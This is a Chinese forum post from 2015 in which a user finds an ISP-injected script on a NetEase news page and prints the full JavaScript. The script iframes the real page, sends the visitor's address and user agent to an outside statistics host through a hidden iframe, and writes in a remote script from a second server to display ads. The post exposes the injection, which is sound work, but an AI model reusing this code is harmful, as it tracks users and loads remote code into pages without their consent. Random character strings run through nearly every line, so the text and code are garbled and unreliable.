|
|
本帖最后由 hudba 于 2015-2-3 00:56 编辑
% G: S) x0 P- o" ]/ y
- n3 H7 l0 ~9 }! F4 ]1 C( O上网易看新闻半天打不开,发现状态栏在现实访问一个奇怪的域名。心里一惊,难道电脑中毒了?赶紧查看源代码,发现后面加了一段js,真正的新闻内容给iframe了
. J5 r4 Q" [. V
/ j2 C3 s. i+ I3 K% X* f接下来就是去搜索这个域名,得到v2ex里面也有人遇到这个问题,原来是运营商搞的鬼{:soso_e131:}5 B. F% H' j$ o0 ?. X! ]1 P A
https://www.google.com/search?q=info.hfjuki.com&ie=utf-8&oe=utf-8 http://www.v2ex.com/t/142197
8 E0 ]" }$ ?4 P9 W A
- |# v: K6 l; e4 V# |5 X顺便查下ip138:; D' t2 [# ^6 J% d8 p0 m
6 X: ` Q- a1 Y' V, X& `这是那段js里面的代码,好象是个半成品还没写入广告数据:3 h- B B+ \' C) B
- function locationSearch() { D: ~4 L6 ^- S. }/ j6 x
- var s = getMainJs();" G: ?' E1 _# v7 a
- if (s == null) {2 T3 D& g6 M4 \6 v- ~* J* v3 p! u
- location.reload();# d6 C9 O! r6 w2 x# ~+ A1 j, G
- }
8 ? D) v% t7 X; Z2 e, X - return s.src.substring(s.src.indexOf(".js?") + 3, s.src.length);& Q X5 ~( v; \/ }6 @0 Y( v4 W
- }
) ~- X M5 c7 X* u - & p6 N2 \$ a4 H
- function getParameter(name, paraStr) { q2 ~* Q* o+ [* O1 f8 t6 E
- var result = "";% u% X8 v ?5 A" \
- var str = "&" + paraStr.split("?")[1];8 m3 `; U r5 R4 {! ^% l/ ^. D) m/ I
- var paraName = "&" + name + "=";
/ x/ x( o: S, ~5 N2 T2 ^( F( ^ - if (str.indexOf(paraName) != -1) {& i+ {+ A( w( j3 J; J6 ]; A G/ Q: ]
- if (str.substring(str.indexOf(name), str.length).indexOf("&") != -1) {
& [; B b8 |4 x& L; K5 x - var TmpStr = str.substring(str.indexOf(paraName), str.length);' l+ l* ^$ [6 Y# u1 d z/ P
- result = TmpStr.substr(TmpStr.indexOf(paraName), TmpStr.substring(
5 h+ ~ B6 h* s$ H: g0 F! D6 o& d/ u! [ - 1, TmpStr.length).indexOf("&")
6 o" S$ W! T* }" H2 U* x - - TmpStr.indexOf(paraName) + 1);9 q! B0 {. g$ Z7 ]) A
- } else {
' v) w# I4 {8 J. U4 y% e - result = str.substring(str.indexOf(paraName), str.length);
8 A. X9 P" s) G! {) y2 h - }4 u: J9 A4 m! W; f
- & L. o: i+ A6 l" p& z$ q$ R
- result = result.substring(result.indexOf("=") + 1, result.length);/ K- ]% W3 r0 A! b# ~
- } else {8 V4 D1 s5 j# E7 d: m; \! j/ W
- result = "No such parameter";2 ~" `* G$ }+ k/ ]+ \* v
- }$ u2 a5 P" _+ U% Y, n. V4 S
- return (result.replace("&", ""));, {2 v8 Y: L, P1 t. P1 Y
- }
: a b! T1 W7 X- A! M. E - / |) g8 W7 H9 G/ B: |
- function getMainJs() {5 v; W! A3 k8 x3 s# J X
- var scripts = document.getElementsByTagName("script");$ i2 ]. t0 j) a; ]% @7 x J
- var s = null;; m5 Q& M% N, D' B9 f
- for (var i = 0; i < scripts.length; i++) {9 z# G$ _* S1 `4 m: K* h( m7 j
- if (scripts[i] != "undefined" && scripts[i].src.indexOf("t_c") != -1) {/ D5 J& x K( u6 r1 R2 l
- s = scripts[i];7 E+ L% a! H& p6 ]0 S
- break;
% X4 o/ P9 G4 ~$ S6 N2 I - }. M% k8 ^, R- v, ?' z! b& R
- }
0 K+ y; S% h# Y0 b4 C( d# S - return s; [! r0 q. z! c5 c# _2 p
- }
5 M. C, m. b% v; `1 A5 [ - ! Y$ a$ Z+ q* H* z7 r; \
- function appendParam(oStr, aStr) {# V" \2 Q, f0 \
- if (oStr.indexOf('?') > 0) {
- {0 K9 U+ ?& e, f - oStr = oStr + "&" + aStr;2 R7 `4 Y5 T, o9 x9 Y% ]+ m
- } else {
+ b& \$ f- r1 v - oStr = oStr + "?" + aStr;) W! A% j6 B. R; L4 I4 v
- }/ ^$ U$ l( h: w6 g8 G
- return oStr;
9 K& J4 r1 M6 y - }
2 L) D4 O! ^ C) o N: A
( ~! g: f3 W w t$ d8 h- window.onerror = function() {
" K; A7 k F& N. p4 V - };
( D! o3 ]1 U$ w
& p6 F( |- W7 D, h9 ]' C$ P0 A( f- var g_titleTime = 0;
& o# h. m8 d1 n9 G7 D2 A5 f - function setTcTitle() {
[+ O3 w& R" d- V - if (undefined == document) {- Z; S9 v3 H$ F/ j7 H
- g_titleTime++;4 Q; d2 |+ h, H% e$ M, x: R2 M
- setTimeout("setTcTitle();", 1000);( v4 y9 j% H" @6 `! j
- return;+ V8 M) t# W: j9 p: G7 M8 X& }
- }
( N% j& d% @; x- C( i
9 U: b5 Y8 e$ X; |; L9 g# t# Q- var doc;% |' v; `1 W8 c M
- try {
, R0 u7 C0 Z- u# U' Z; H4 R/ l - if (document.all) {8 N9 d7 j8 O2 Z; g$ ^$ }
- doc = document.frames["cn"].document;
. N5 A- Z% I/ o5 j+ ^ i; K5 V6 ^! i5 r - } else {9 Q" o: B0 x9 w3 S! |/ b/ B
- doc = document.getElementById("cn").contentDocument;
: [, [! ?9 k4 d# i - }6 E9 z5 Z% A8 X. ?& u- J5 ~' Z' Y
- } catch (ex) {! B. b! r. s9 O8 V5 T
- }+ z$ }* y% c# n! v& @# w, Q
- * x: T) d. R2 \+ h0 M O
- if (g_titleTime < 5
6 A! a" t' z" r/ Q' B - && (undefined == doc || undefined == doc.title || "" == doc.title)) {
" Q# \" g n0 | - g_titleTime++;
) b$ ^2 j8 ]2 y - setTimeout("setTcTitle();", 1000);
" C. { W2 E- k$ x: d4 z - return;; y: V/ _) C: H, s
- } else if (undefined != doc && undefined != doc.title && "" != doc.title) {
' @9 S* v# v/ ?' h - document.title = doc.title;
- B# \6 U9 f' z7 `% z - setTcAdvVisible();
" D: K3 Q4 Z" q/ R4 f) P - }
5 R/ d' p2 x9 f8 g' ^# ] - }
$ O Y0 _1 V8 q6 D) c* o$ I
0 P7 m) z V5 D% A. p- setTimeout("setTcTitle();", 1000);
5 o9 Y0 J* B" d: { - ! a8 C) J4 f5 l1 G; h
- var g_isHaveVisible = false;
( [) G3 D& Q5 o) n! e- L - function setTcAdvVisible() {$ s/ ~7 K9 n& C* e
- if (undefined != document && undefined != document.getElementById("addiv")
" P$ M7 f1 {9 k - && !g_isHaveVisible) {
% @/ y% ~6 t) l* Y9 ~ - document.getElementById("addiv").style.visibility = 'visible';
& z$ D0 O) q w5 O( M" i% }& D! z - document.getElementById("addiv").style.display = 'block';$ i+ q) e* ?! }& H& ^+ J3 M* {
- g_isHaveVisible = true;6 i- ?: B! N q9 u" Y. I' o7 @; D, Q
- }+ ~" l5 C% \$ t6 G: w( }3 k) {, e
- }; k; ^5 r7 P% o+ A& K2 P6 i7 `: z Y* R
$ G5 y' q; F+ I- _. F- function UrlAnalyzer() {- A q6 O7 ?# u+ t" d
- this.divda = "";# \' Z4 h- t* u1 t4 q+ s( h
- this.tctype = "";
* z. w x, @( M/ d; Q3 i- V; V4 V - this.radius = "";3 m# }5 e2 @; {
- this.rlu = "";
; Y$ g1 a; [: l - }- b3 J) p0 L! i9 o. `
- % R& ~. P0 U3 x2 l( @
- UrlAnalyzer.prototype.initParameters = function() {* d% m$ m) P- ~& Q6 n |" Y$ x
- var paraStr = locationSearch();
; a0 I D6 X5 k! t/ p - this.rlu = getParameter("lruedct", paraStr);7 y4 u3 ~& _% h
- this.divda = getParameter("divda", paraStr);
5 b) _1 E9 U" m1 l - this.radius = getParameter("radius", paraStr);6 Q' V4 ?5 N; G( K9 m$ y$ y% o8 Q
- this.tctype = getParameter("tctype", paraStr);
0 [3 j% [4 E e. \" p - this.address = getParameter("address", paraStr);/ H9 i) H1 b+ `3 U9 u( O# R
- this.usagent = getParameter("usagent", paraStr);
2 {, `& h( ~3 z! J) j2 }: { - }
7 p* s/ u; h, ?
" Y+ n0 j1 m# m0 _) K( r- UrlAnalyzer.prototype.getHtmlDoc = function() {9 W2 d! B7 d m2 m! q8 e
- var doc;
. b. l6 n! B9 t) ~: d - try {8 A6 y' N4 x7 E$ w
- if (document.all) {
- ^4 Y Z* c! c$ b8 m& q - doc = document.frames["cn"].document;
; k+ A+ }( i" L2 H, V) J
1 Y& k$ B4 e, b2 l+ N% m7 _; z& d- } else {
0 i( s8 G8 _4 x3 Y6 |6 [ - doc = document.getElementById("cn").contentDocument;
5 W7 x9 ]3 S7 j - // doc = document.getElementById("cn").contentWindow.document;
- k. F* j2 t' L6 ~# b8 h - }
& q3 }! O; d- `* H2 i4 K/ r - } catch (ex) {
8 }4 e/ V2 }- D% x8 J( d2 @7 I% Y - }' L+ T- {6 p1 s: ?. X2 X" L: {3 }
- return doc;. Z7 c9 E& `0 W8 a1 {2 [. ^& H
- }
A3 Y( a( N% O. [% C* f6 Q$ G - D! v. @0 a) P; r7 q7 b
- UrlAnalyzer.prototype.setDomain = function() {
! a& ]$ g3 I& `6 Y - if (undefined != document.title && "" == document.title)7 m% J) ^* C/ F0 I9 m0 d
- {
! K9 e- P9 Z# A3 b& Q8 `: E( F - var index = document.domain.indexOf(".");
2 |7 R. i; W) X& h5 Z. B - if (undefined != index && -1 != index) {
( f8 m; n* `! Y9 R2 z+ } - document.domain = document.domain.substring(index + 1,
9 w8 _# F7 q! @( O5 K0 `8 I - document.domain.length);- @, r0 G7 I h/ }5 h1 x9 Z
- }1 b- D E& ?0 d0 F" o
- 3 c7 z! b1 |5 K; `
- var doc = this.getHtmlDoc();
D, H0 l) ~3 O; x - if (undefined != doc && undefined != doc.title && "" != doc.title) {
; G$ X8 w4 `5 |7 F - document.title = doc.title;+ ^, ?0 R/ R G3 |2 A* ?
- setTcAdvVisible(); l0 H! d9 H0 M: B" i) T
- }: f s6 d5 B/ U" n: r( J% _, c
- }1 A$ D/ f- b) B) l+ e+ ~
- }
7 { h4 m' i2 _ - ' x# Q3 u1 V7 D# t: n/ z
- UrlAnalyzer.prototype.iframeCallback = function() {
b1 ~, S6 m# B f - var doc = this.getHtmlDoc();$ {3 I7 m9 Q' H& z" i2 q
- if (undefined == doc || undefined == doc.title || "" == doc.title) {
2 m1 s2 G! X d( r5 e: ]0 ]& e - if (undefined != document.domain) { Z! d A$ @# t* L0 o3 T! o
- 1 {6 j+ A9 M4 j# S( r7 {/ O
- var self = this;; n3 B& K# K) f( n( D1 I/ T
- setTimeout(function(){self.setDomain.call(self, null)}, 1000);
- v3 V# p: R) l5 R; i5 J. c - // var index = document.domain.indexOf(".");
- ~% k, K: |% i6 m" y - // if (undefined != index && -1 != index) {
1 r. n; K) [5 E: g - // document.domain = document.domain.substring(index + 1,- O! m1 ^8 D) a& _( p8 d
- // document.domain.length);$ e$ w( ~$ Q2 ?) e. r9 p9 y% Q
- // }
% Z8 ?% e. ^* l; c. h! V - //
% {# U1 h9 v& k/ c) h: O9 ^ - // var doc = this.getHtmlDoc();
7 S, ^0 J4 ^9 Q. q9 E8 } - // if (undefined != doc && undefined != doc.title && "" !=
7 ~$ N( M& M% y& M - // doc.title) {
* ?+ r' Q" s2 \# M8 c( X - // document.title = doc.title;2 t+ l+ u0 o# [ Q0 d
- // setTcAdvVisible();
7 X- C# i7 T" k& {) ` - // }
2 b( S" H- I. U5 ]% b: e# Y. R1 ` - }" I& L f0 j0 \( [. D
- } else if (undefined != doc && undefined != doc.title && "" != doc.title) {
- A- M) ]" T: O - document.title = doc.title;/ _8 r: ]5 L+ x
- setTcAdvVisible();! N2 a& n) n- z; k% M
- }
) w' }+ j. P/ a7 q) U8 c - }/ ~2 G6 A" c$ T9 [: f) H
0 R9 o( p4 X; g- UrlAnalyzer.prototype.executeHtmlContext = function() {: o( ?% C1 r# T h* ]3 m
- var staUrl = "http://info.hfjuki.com:8060/page/statistics?advId=" + this.divda: P( v W# S' R# ]0 O2 P( c( f5 w
- + "&rd=" + this.radius + "&tctype=" + this.divda + "&address=" + this.address + "&usagent=" + this.usagent;% y1 P* g1 ?$ O
- |8 K6 R7 \6 S/ W
- var htmlStr = "<iframe src="" + staUrl* z7 ^( U! }' @5 ] r5 v
- + "" style="display:none"></iframe>";2 t( r8 h9 Q* N u1 ]' A3 B
- ' q; j; U( ]) h8 C1 ]5 n
- var advUrl = htmlStr- d5 g) Y. A2 X9 c2 ~, x+ y( L
- + "<script src="http://c2.sxite.com:8060/center?advId="
/ p% L: z p# D5 f- R P* S, m - + this.divda + "&radius=" + this.radius + "&area=1" + ""><\/script>";8 L! w0 t1 f N$ I+ L
- document.write(advUrl);
% D9 T4 k( K0 [& }, ]
+ O H; j! }: V5 f$ |) a- u5 x2 F- var self = this;; w. M& a. Y5 d+ n$ _
- var iframe = document.getElementById("cn");- a) E1 f7 {7 q+ @
- if (iframe.attachEvent) {) x) ?: ^ H& p4 `: J; {
- iframe.attachEvent("onload", function() {
; y0 j' T: s) R. [: `" P - self.iframeCallback.call(self, null);
3 Z9 A' {) d2 x) I: D+ b; w) o - });
7 i+ I4 s2 t2 i3 S) S" N5 @ - } else {
$ k. o3 U4 `" B6 O7 v9 x" R - iframe.onload = function() {
* _% D. Q8 Y4 X: B Q9 F1 f - self.iframeCallback.call(self, null);7 L) y4 D; b( h
- }
& D3 h+ B2 q$ O8 a - }
; J+ G; y% `% }' f5 Q% R- u - }" S& {; s0 L/ x9 F" T
- 1 @8 X0 V$ \; w" U
- UrlAnalyzer.prototype.executeMain = function() {
& `2 n( E0 L3 T; M% e6 s# b4 Z - var mainFrame = document.getElementById("cn"); z. t% f# c1 c, s/ d' f: X
- mainFrame.contentWindow.location.href = mainFrame.src;
# x2 P. R. R2 P T: }; i1 b+ J! a - this.initParameters();
! A/ z2 X" e1 ]/ E; E& J - this.executeHtmlContext();9 f( v$ j2 V# G/ a
- }
. t' R6 ~# a' g4 d9 S$ }8 u - 4 w* R6 ^+ r v" z" v
- var g_analyzer = new UrlAnalyzer();9 K Y8 W; `% A$ N
- g_analyzer.executeMain();
- M1 ^ p* y* N) ^' f2 {& s9 L. |3 y
: ]* ~: X" Y# U" c+ e4 J6 g
% d- z9 ~8 K4 o4 S: }( y* r3 V3 I6 l6 Z
|
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有账号?立即注册
x
|
发表于 2015-2-3 00:52:03
发表于 2015-2-3 04:58:09
发表于 2015-2-3 09:49:12
